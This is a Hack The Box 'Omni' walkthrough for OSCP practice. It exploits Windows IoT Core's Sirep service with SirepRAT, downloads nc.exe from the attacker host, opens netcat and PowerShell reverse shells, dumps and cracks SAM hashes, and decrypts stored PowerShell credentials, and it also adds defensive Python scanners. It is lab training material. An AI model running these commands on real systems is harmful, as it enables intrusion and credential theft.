In this practice box from Hack The Box (HTB), we explore one of the machines from TJNull’s list, which is widely recognized as part of the essential preparation for the Offensive Security Certified Professional (OSCP) exam. TJNull’s curated list is designed to help individuals hone their penetration testing skills and get accustomed to the types of challenges they’ll face during the OSCP. This particular box reflects the practical, hands-on nature of the OSCP certification process, providing an excellent opportunity for learners to test and expand their knowledge in a controlled, realistic environment. Whether you’re a seasoned security professional or just starting, working through this box will be a valuable step in your OSCP preparation journey.
Enumeration
Nmap output
# Nmap 7.94 scan initiated Sun Oct 29 07:53:31 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/HTB/omni/results/10.10.10.204/scans/_quick_tcp_nmap.txt -oX /home/kali/HTB/omni/results/10.10.10.204/scans/xml/_quick_tcp_nmap.xml 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up, received user-set (0.38s latency).
Scanned at 2023-10-29 07:53:39 EDT for 39s
Not shown: 998 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
8080/tcp open upnp syn-ack Microsoft IIS httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Site doesn't have a title.
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 29 07:54:18 2023 -- 1 IP address (1 host up) scanned in 46.66 seconds
Full Nmap
# Nmap 7.94 scan initiated Sun Oct 29 07:53:31 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/HTB/omni/results/10.10.10.204/scans/_full_tcp_nmap.txt -oX /home/kali/HTB/omni/results/10.10.10.204/scans/xml/_full_tcp_nmap.xml 10.10.10.204
Nmap scan report for 10.10.10.204
Host is up, received user-set (0.36s latency).
Scanned at 2023-10-29 07:53:39 EDT for 1013s
Not shown: 65529 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
135/tcp open msrpc syn-ack Microsoft Windows RPC
5985/tcp open upnp syn-ack Microsoft IIS httpd
8080/tcp open upnp syn-ack Microsoft IIS httpd
|_http-title: Site doesn't have a title.
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=Windows Device Portal
|_http-server-header: Microsoft-HTTPAPI/2.0
29817/tcp open unknown syn-ack
29819/tcp open arcserve syn-ack ARCserve Discovery
29820/tcp open unknown syn-ack
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port29820-TCP:V=7.94%I=9%D=10/29%Time=653E4A6A%P=x86_64-pc-linux-gnu%r(
SF:NULL,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(GenericLines,10,
SF:"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Hello,10,"\*LY\xa5\xfb`\
SF:x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Help,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc
SF:9}\xc8O\x12")%r(JavaRMI,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")
SF:%r(mydoom,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(VerifierAdv
SF:anced,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(HELP4STOMP,10,"
SF:\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(Memcache,10,"\*LY\xa5\xfb
SF:`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(beast2,10,"\*LY\xa5\xfb`\x04G\xa9m\x1
SF:c\xc9}\xc8O\x12")%r(ajp,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")
SF:%r(dominoconsole,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(riak
SF:-pbc,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(epmd,10,"\*LY\xa
SF:5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(vp3,10,"\*LY\xa5\xfb`\x04G\xa9m\
SF:x1c\xc9}\xc8O\x12")%r(kumo-server,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\
SF:xc8O\x12")%r(minecraft-ping,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x
SF:12")%r(teamspeak-tcpquery-ver,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O
SF:\x12")%r(VersionRequest,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")
SF:%r(teamtalk-login,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12")%r(ins
SF:teonPLM,10,"\*LY\xa5\xfb`\x04G\xa9m\x1c\xc9}\xc8O\x12");
Service Info: Host: PING; OS: Windows; CPE: cpe:/o:microsoft:windows
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Oct 29 08:10:32 2023 -- 1 IP address (1 host up) scanned in 1020.66 seconds
Couldn't find anything via HTTP on 8080: just a login window, every attempt to get past it failed, and there was nothing in the page source.
Googled port 29820 and found this article on LinkedIn –> https://www.linkedin.com/pulse/remote-code-execution-sirep-windows-iot-tanzil-rehman/ and a reference to GitHub –> https://github.com/SafeBreach-Labs/SirepRATK
Windows IoT Core, by default, has 3 open ports for incoming connections that are used by Sirep. Following are the ports:
1. 29820 - command communication
2. 29819
3. 29817
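The three Sirep ports are the thing to look for from the defender's side too: an IoT Core device with the test/debug Sirep service reachable from the network is a finding regardless of what else is running. The following is an added example (not code from the original post or from the SirepRAT project) that parses Nmap's normal output and flags any host exposing those ports, treating 29820 (the command channel, per the list above) as the most serious and noting when the Windows Device Portal on 8080 is reachable as well. The sample report embedded in the block is constructed (hosts 10.0.0.5 and 10.0.0.6 are made up) and mirrors the port table from the scan above; the parser itself is generic.

```python
"""Flag hosts that expose the Sirep ports of Windows IoT Core in Nmap
normal-format output. Added example, not from the original post or from the
SirepRAT project. SAMPLE_REPORT is constructed (made-up hosts 10.0.0.5 and
10.0.0.6) in the shape of the walkthrough's scan."""
import re

# Ports the post lists as opened by Sirep on Windows IoT Core;
# 29820 is the command channel, so it is treated as the most serious.
SIREP_PORTS = {29817, 29819, 29820}
SIREP_COMMAND_PORT = 29820
# Realm the Windows Device Portal returned on 8080 in the scan.
DEVICE_PORTAL_REALM = "Windows Device Portal"

HOST_LINE = re.compile(r"^Nmap scan report for (\S+)")
PORT_LINE = re.compile(r"^(\d+)/tcp\s+open\b")


def parse_nmap_report(text):
    """Return {host: {"open": set_of_ports, "device_portal": bool}}."""
    hosts, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        m = HOST_LINE.match(line)
        if m:
            current = m.group(1)
            hosts[current] = {"open": set(), "device_portal": False}
            continue
        if current is None:
            continue  # header lines before the first host
        m = PORT_LINE.match(line)
        if m:
            hosts[current]["open"].add(int(m.group(1)))
        elif DEVICE_PORTAL_REALM in line:
            hosts[current]["device_portal"] = True
    return hosts


def sirep_findings(text):
    """One finding string per host with at least one Sirep port open."""
    findings = []
    for host, info in parse_nmap_report(text).items():
        exposed = sorted(info["open"] & SIREP_PORTS)
        if not exposed:
            continue
        severity = "HIGH" if SIREP_COMMAND_PORT in exposed else "MEDIUM"
        extra = " (Windows Device Portal also reachable)" if info["device_portal"] else ""
        findings.append(f"{severity}: {host} exposes Sirep port(s) {exposed}{extra}")
    return findings


# Constructed sample in Nmap's normal output format (hosts are made up).
SAMPLE_REPORT = """\
Nmap scan report for 10.0.0.5
Host is up (0.36s latency).
PORT      STATE SERVICE  REASON  VERSION
135/tcp   open  msrpc    syn-ack Microsoft Windows RPC
8080/tcp  open  upnp     syn-ack Microsoft IIS httpd
| http-auth:
|_  Basic realm=Windows Device Portal
29817/tcp open  unknown  syn-ack
29819/tcp open  arcserve syn-ack ARCserve Discovery
29820/tcp open  unknown  syn-ack
Nmap scan report for 10.0.0.6
Host is up (0.01s latency).
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2
"""

if __name__ == "__main__":
    for finding in sirep_findings(SAMPLE_REPORT):
        print(finding)
```

The match is deliberately by port number rather than by Nmap's service name: as the full scan above shows, Nmap labels 29820 "unknown" and guesses "arcserve" for 29819, so a service-name match would miss the device. Feed it `-oN` output from an internal scan and anything it returns should be firewalled off or have Sirep disabled.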
Git clone the repo
╭─kali@kali ~/HTB/omni
╰─$ git clone https://github.com/SafeBreach-Labs/SirepRAT.git
Cloning into 'SirepRAT'...
remote: Enumerating objects: 217, done.
remote: Counting objects: 100% (17/17), done.
remote: Compressing objects: 100% (6/6), done.
remote: Total 217 (delta 12), reused 11 (delta 11), pack-reused 200
Receiving objects: 100% (217/217), 6.38 MiB | 8.15 MiB/s, done.
Resolving deltas: 100% (138/138), done.
╭─kali@kali ~/HTB/omni
╰─$
PoC on the box: download a file
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\drivers\etc\hosts" --v
---------
---------
---------
# Copyright (c) 1993-2009 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a '#' symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# localhost name resolution is handled within DNS itself.
# 127.0.0.1 localhost
# ::1 localhost
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 824, payload peek: 'b'# Copyright (c) 1993-2009 Microsoft Corp.\r\n#\r\n# Th''>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$
PoC to upload a file, then download it again
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT worl"d 130 ↵
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 PutFileOnDevice --remote_path "C:\Windows\System32\uploaded.txt" --data "Hello IoT world"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$ python SirepRAT.py 10.10.10.204 GetFileFromDevice --remote_path "C:\Windows\System32\uploaded.txt" --v
---------
---------
---------
Hello IoT world
---------
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
<FileResult | type: 31, payload length: 1332, payload peek: 'b'H\x00e\x00l\x00l\x00o\x00 \x00I\x00o\x00T\x00 \x00w\x00o\x00r\x00l\x00d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00''>
╭─kali@kali ~/HTB/omni/SirepRAT ‹master›
╰─$
We will try a PowerShell reverse shell script.
Using Invoke-PowerShellTcp.ps1, which we edit by adding the line Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.39 -Port 444 at the bottom:
Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port."
Write-Error $_
}
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.39 -Port 444
Set up a listener on Kali
╭─kali@kali ~/HTB/omni
╰─$ nc -nlvp 444
listening on [any] 444 ...
We serve nc.exe over HTTP, then run SirepRAT twice: once to fetch it and once to execute it.
╭─kali@kali ~/HTB/omni
╰─$ ls
Invoke-PowerShellTcp.ps1 nc_base64.txt nc.exe results SirepRAT
╭─kali@kali ~/HTB/omni
╰─$ serve 900
The tun0 IP is 10.10.14.39 and the eth0 IP is 192.168.1.10.
Starting HTTP server on port 900...
Serving HTTP on 0.0.0.0 port 900 (http://0.0.0.0:900/) ...
Upload the file to the machine
╭─kali@kali ~/HTB/omni/SirepRAT ‹master●›
╰─$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c powershell Invoke-WebRequest -OutFile c:\windows\system32\nc.exe -Uri http://10.10.14.39:900/nc.exe"
<HResultResult | type: 1, payload length: 4, HResult: 0x0>
We run nc from the machine while listening on 444
╭─kali@kali ~/HTB/omni/SirepRAT ‹master●›
╰─$ python SirepRAT.py 10.10.10.204 LaunchCommandWithOutput --return_output --cmd "C:\Windows\System32\cmd.exe" --args "/c nc.exe 10.10.14.39 444 -e cmd.exe"
and we get a shell:
╭─kali@kali ~/HTB/omni
╰─$ nc -nlvp 444
listening on [any] 444 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.204] 49675
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>
SAM dumping (reference: https://www.hackingarticles.in/credential-dumping-sam/)
reg save hklm\sam c:\temp\sam
reg save hklm\system c:\temp\system
We save both hives (the commands below write them to the root of C:)
C:\Windows\system32\config>reg save HKLM\SYSTEM c:\SYSTEM
reg save HKLM\SYSTEM c:\SYSTEM
The operation completed successfully.
C:\Windows\system32\config>reg save HKLM\SAM c:\SAM
reg save HKLM\SAM c:\SAM
File c:\SAM already exists. Overwrite (Yes/No)?y
The operation completed successfully.
C:\Windows\system32\config>
Using Impacket's smbserver.py so that we can copy the hives across
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ ./smbserver.py -smb2support share /home/kali/HTB/omni -username test -password test
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.10.204,49706)
[*] AUTHENTICATE_MESSAGE (\test,omni)
[*] User omni\test authenticated successfully
[*] test:::aaaaaaaaaaaaaaaa:1df7a50dfe721c83096196b1b747074b:010100000000000080631c3b720dda0133a0710428d249aa000000000100100057006700680069004b004c00550044000300100057006700680069004b004c0055004400020010004d0053006f004f006e0072004f004b00040010004d0053006f004f006e0072004f004b000700080080631c3b720dda01060004000200000008003000300000000000000000000000004000004148c16b34543226f456253f12fc19de2a35ddf669a94651ca9f90eac001cf6e0a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e0033003900000000000000000000000000
[*] Connecting Share(1:IPC$)
[*] Connecting Share(2:share)
[*] Disconnecting Share(1:IPC$)
[*] Connecting Share(3:IPC$)
[*] Disconnecting Share(3:IPC$)
With the share up (username and password set as above), map it on the Windows machine and copy the files:
C:\>net use \\10.10.14.39\share /user:test test /persistent:no
net use \\10.10.14.39\share /user:test test /persistent:no
The command completed successfully.
C:\>copy SAM \\10.10.14.39\share
copy SAM \\10.10.14.39\share
1 file(s) copied.
C:\>copy SYSTEM \\10.10.14.39\share
copy SYSTEM \\10.10.14.39\share
1 file(s) copied.
Dumping the hashes. I used samdump2 but it gave me hashes without the username. I then tried secretsdump.
╭─kali@kali ~/HTB/omni
╰─$ samdump2 SYSTEM SAM > sam.txt
╭─kali@kali ~/HTB/omni
╰─$ cat sam.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* :504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1000:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1002:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
╭─kali@kali ~/HTB/omni
╰─$ /usr/share/doc/python3-impacket/examples/secretsdump.py -sam SAM -system SYSTEM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x4a96b0f404fd37b862c07c2aa37853a5
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:330fe4fd406f9d0180d67adb0b0dfa65:::
sshd:1000:aad3b435b51404eeaad3b435b51404ee:91ad590862916cdfd922475caed3acea:::
DevToolsUser:1002:aad3b435b51404eeaad3b435b51404ee:1b9ce6c5783785717e9bbb75ba5f9958:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
[*] Cleaning up...
╭─kali@kali ~/HTB/omni
╰─$
Output the hashes to a hash file as below
Administrator:a01f16a7fa376962dbeb29a764a06f00
Guest:31d6cfe0d16ae931b73c59d7e0c089c0
DefaultAccount:31d6cfe0d16ae931b73c59d7e0c089c0
WDAGUtilityAccount:330fe4fd406f9d0180d67adb0b0dfa65
sshd:91ad590862916cdfd922475caed3acea
DevToolsUser:1b9ce6c5783785717e9bbb75ba5f9958
app:e3cb0651718ee9b4faffe19a51faff95
hashcat found the password for app:
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
e3cb0651718ee9b4faffe19a51faff95:mesh5143
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
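Two things in the secretsdump output and the hashcat result above are worth making concrete. First, the NT hash 31d6cfe0d16ae931b73c59d7e0c089c0 that shows up for Guest and DefaultAccount is the hash of an empty password, which is exactly what a SAM audit should flag. Second, an NT hash is plain MD4 over the UTF-16LE encoding of the password with no salt, which is why a wordlist run finishes in seconds and why two accounts with the same password have the same hash. The block below is an added example, not code from the post, from Impacket or from hashcat: it audits pwdump-style lines (uid:rid:lmhash:nthash:::, the format secretsdump prints) and carries a small pure-Python MD4 so the check runs even where hashlib's md4 is disabled by the OpenSSL build. The sample input reuses the Administrator, Guest, DefaultAccount and app lines from the dump above plus one constructed "legacy" account whose LM hash value is made up.

```python
"""Audit a pwdump-style SAM dump for accounts with no password set and show
why NT hashes crack so readily: NT hash = MD4(UTF-16LE(password)), unsalted.
Added example, not from the post, Impacket or hashcat. The MD4 is a minimal
pure-Python implementation (hashlib's md4 is often disabled on modern
OpenSSL). The "legacy" sample line and its LM hash value are constructed."""
import struct

# MD4 of the empty string == NT hash of an empty password.
EMPTY_NT_HASH = "31d6cfe0d16ae931b73c59d7e0c089c0"
# LM hash stored when LM hashing is disabled (the normal, desired state).
BLANK_LM_HASH = "aad3b435b51404eeaad3b435b51404ee"


def md4(data):
    """RFC 1320 MD4 over bytes, returned as lowercase hex."""
    mask = 0xFFFFFFFF
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & mask
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)  # bit length, little-endian
    a, b, c, d = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = (
        (f, 0x00000000, tuple(range(16)), (3, 7, 11, 19)),
        (g, 0x5A827999, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13)),
        (h, 0x6ED9EBA1, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15)),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        aa, bb, cc, dd = a, b, c, d
        for func, const, order, shifts in rounds:
            for i, k in enumerate(order):
                a = rotl((a + func(b, c, d) + x[k] + const) & mask, shifts[i % 4])
                a, b, c, d = d, a, b, c  # rotate registers for the next step
        a, b, c, d = (a + aa) & mask, (b + bb) & mask, (c + cc) & mask, (d + dd) & mask
    return struct.pack("<4I", a, b, c, d).hex()


def nt_hash(password):
    """NT hash: MD4 of the UTF-16LE password, no salt, so equal passwords collide."""
    return md4(password.encode("utf-16le"))


def audit_sam_dump(lines):
    """Parse uid:rid:lmhash:nthash::: lines; return (user, rid, issue) tuples."""
    issues = []
    for line in lines:
        parts = line.strip().split(":")
        if len(parts) < 4 or line.startswith("["):
            continue  # blank lines and tool status lines such as "[*] ..."
        user, rid, lm, nt = parts[0], int(parts[1]), parts[2].lower(), parts[3].lower()
        if nt == EMPTY_NT_HASH:
            issues.append((user, rid, "empty password"))
        if lm != BLANK_LM_HASH:
            issues.append((user, rid, "LM hash stored (legacy, trivially cracked)"))
    return issues


# Four lines from the walkthrough's secretsdump output plus one constructed
# "legacy" entry with a made-up LM hash and the same NT hash as app.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a01f16a7fa376962dbeb29a764a06f00:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
app:1003:aad3b435b51404eeaad3b435b51404ee:e3cb0651718ee9b4faffe19a51faff95:::
legacy:1010:0123456789abcdef0123456789abcdef:e3cb0651718ee9b4faffe19a51faff95:::
""".splitlines()

if __name__ == "__main__":
    for user, rid, issue in audit_sam_dump(SAMPLE_DUMP):
        print(f"{user} (RID {rid}): {issue}")
    # The password hashcat recovered above reproduces app's NT hash; "legacy"
    # carries the identical hash, which with no salt means the same password.
    print("mesh5143 ->", nt_hash("mesh5143"))
```

Run against a real dump, the empty-password and LM-hash findings are the ones to act on; the nt_hash() function is there so you can confirm for yourself that the cracked value really does hash to app's entry and that the scheme has no per-user salt.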
Logging in to the website with these credentials, then running the nc.exe command to get another reverse shell on 4444:
C:\windows\system32\nc.exe 10.10.14.39 4444 -e cmd.exe
╭─kali@kali /usr/share/doc/python3-impacket/examples
╰─$ nc -nlvp 4444
listening on [any] 4444 ...
connect to [10.10.14.39] from (UNKNOWN) [10.10.10.204] 49676
Microsoft Windows [Version 10.0.17763.107]
Copyright (c) Microsoft Corporation. All rights reserved.
C:\windows\system32>
Checking who we are via PowerShell
PS C:\windows\system32> [System.Security.Principal.WindowsIdentity]::GetCurrent().Name
[System.Security.Principal.WindowsIdentity]::GetCurrent().Name
OMNI\app
PS C:\windows\system32>
We check for the flag
PS C:\data> cd users
cd users
PS C:\data\users> cd app
cd app
PS C:\data\users\app> dir
dir
Directory: C:\data\users\app
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 7/4/2020 7:28 PM 3D Objects
d-r--- 7/4/2020 7:28 PM Documents
d-r--- 7/4/2020 7:28 PM Downloads
d----- 7/4/2020 7:28 PM Favorites
d-r--- 7/4/2020 7:28 PM Music
d-r--- 7/4/2020 7:28 PM Pictures
d-r--- 7/4/2020 7:28 PM Videos
-ar--- 7/4/2020 8:20 PM 344 hardening.txt
-ar--- 7/4/2020 8:14 PM 1858 iot-admin.xml
-ar--- 7/4/2020 9:53 PM 1958 user.txt
PS C:\data\users\app> type user.txt
type user.txt
<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
<Obj RefId="0">
<TN RefId="0">
<T>System.Management.Automation.PSCredential</T>
<T>System.Object</T>
</TN>
<ToString>System.Management.Automation.PSCredential</ToString>
<Props>
<S N="UserName">flag</S>
<SS N="Password">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</SS>
</Props>
</Obj>
</Objs>
PS C:\data\users\app> type hardening.txt
type hardening.txt
- changed default administrator password of "p@ssw0rd"
- added firewall rules to restrict unnecessary services
- removed administrator account from "Ssh Users" group
PS C:\data\users\app>
Got tips from this page –> https://ivanitlearning.wordpress.com/2021/03/14/hackthebox-omni/ which in turn points to https://devblogs.microsoft.com/scripting/decrypt-powershell-secure-string-password/
PS C:\data\users\app> (Import-CliXml -Path .\user.txt).GetNetworkCredential() | Format-List
(Import-CliXml -Path .\user.txt).GetNetworkCredential() | Format-List
UserName : flag
Password : 7cfd50f6bc34db3204898f1505ad9d70
Domain :
PS C:\data\users\app> (Import-CliXml -Path .\iot-admin.xml).GetNetworkCredential() | Format-List
(Import-CliXml -Path .\iot-admin.xml).GetNetworkCredential() | Format-List
UserName : administrator
Password : _1nt3rn37ofTh1nGz
Domain : omni
PS C:\data\users\app>
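The reason Import-CliXml hands the password straight back is worth spelling out: Export-CliXml stores a SecureString as a hex-encoded DPAPI blob protected in the exporting user's scope, so anyone running code as that user on that machine (here, app) can recover it, and iot-admin.xml contained the administrator's password. From the defender's side the useful move is to hunt for such exports in user profiles before someone else does. The block below is an added example, not code from the post or from Microsoft: it walks a directory, parses CliXml documents, reports every PSCredential object with its user name, and checks whether the <SS> value carries the DPAPI blob header (the constant version field and provider GUID every DPAPI blob begins with). The embedded XML is constructed in the shape of user.txt above; the user name svc-backup and the blob body after the header are placeholders, not real data.

```python
"""Hunt for PSCredential objects saved with Export-CliXml and report whom
they belong to. Added example, not from the post or from Microsoft. The
sample XML is constructed (svc-backup and the blob tail are placeholders)."""
import os
import xml.etree.ElementTree as ET

PS_NS = "http://schemas.microsoft.com/powershell/2004/04"
PSCREDENTIAL = "System.Management.Automation.PSCredential"
# Every DPAPI blob starts with version 1 and the DPAPI provider GUID
# (d08c9ddf-0115-d111-8c7a-00c04fc297eb, stored little-endian); Export-CliXml
# writes the blob as hex, so this prefix identifies a user-scope protected string.
DPAPI_BLOB_PREFIX = "01000000d08c9ddf0115d1118c7a00c04fc297eb"


def _q(tag):
    """Namespace-qualify a CliXml element name."""
    return f"{{{PS_NS}}}{tag}"


def is_dpapi_protected(securestring_hex):
    """True when an <SS> value is a hex DPAPI blob, i.e. decryptable only in
    the exporting user's context on the exporting host."""
    return securestring_hex.lower().startswith(DPAPI_BLOB_PREFIX)


def find_exported_credentials(xml_text):
    """Return one dict per PSCredential object in a CliXml document."""
    root = ET.fromstring(xml_text)
    found = []
    for obj in root.iter(_q("Obj")):
        types = {t.text for t in obj.iter(_q("T"))}
        if PSCREDENTIAL not in types:
            continue
        user = obj.find(f"{_q('Props')}/{_q('S')}[@N='UserName']")
        secret = obj.find(f"{_q('Props')}/{_q('SS')}[@N='Password']")
        secret_text = (secret.text or "") if secret is not None else ""
        found.append({
            "user": user.text if user is not None else None,
            "dpapi": is_dpapi_protected(secret_text),
            "securestring_len": len(secret_text),
        })
    return found


def scan_tree(root_dir, suffixes=(".xml", ".txt", ".clixml")):
    """Walk root_dir and return (path, credential_dict) for every hit.
    Files that are not well-formed XML are skipped."""
    hits = []
    for dirpath, _, names in os.walk(root_dir):
        for name in names:
            if not name.lower().endswith(suffixes):
                continue
            path = os.path.join(dirpath, name)
            try:
                with open(path, "r", encoding="utf-8-sig", errors="ignore") as fh:
                    creds = find_exported_credentials(fh.read())
            except ET.ParseError:
                continue
            hits.extend((path, cred) for cred in creds)
    return hits


# Constructed sample in the shape of the user.txt shown in the walkthrough.
SAMPLE_CLIXML = f"""<Objs Version="1.1.0.1" xmlns="{PS_NS}">
  <Obj RefId="0">
    <TN RefId="0">
      <T>{PSCREDENTIAL}</T>
      <T>System.Object</T>
    </TN>
    <ToString>{PSCREDENTIAL}</ToString>
    <Props>
      <S N="UserName">svc-backup</S>
      <SS N="Password">{DPAPI_BLOB_PREFIX}0000000000000000</SS>
    </Props>
  </Obj>
</Objs>"""

if __name__ == "__main__":
    for cred in find_exported_credentials(SAMPLE_CLIXML):
        print(cred)
```

Point scan_tree() at the users directory (C:\data\users on IoT Core, as the listing above shows) and each hit names an account whose credential is one Import-CliXml away for anyone running as the file's owner; the fix is to remove the file and rotate that account's password, since the walkthrough's iot-admin.xml shows how a low-privilege user's profile can hold the administrator's credential.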
We log in to the website as administrator with _1nt3rn37ofTh1nGz,
run the command C:\windows\system32\nc.exe 10.10.14.39 4443 -e cmd.exe,
receive the shell, and confirm we are Administrator:
╭─kali@kali ~/HTB/omni/SirepRAT ‹master●›
╰─$ nc -nlvp 4443
listening on [any] 4443 ...
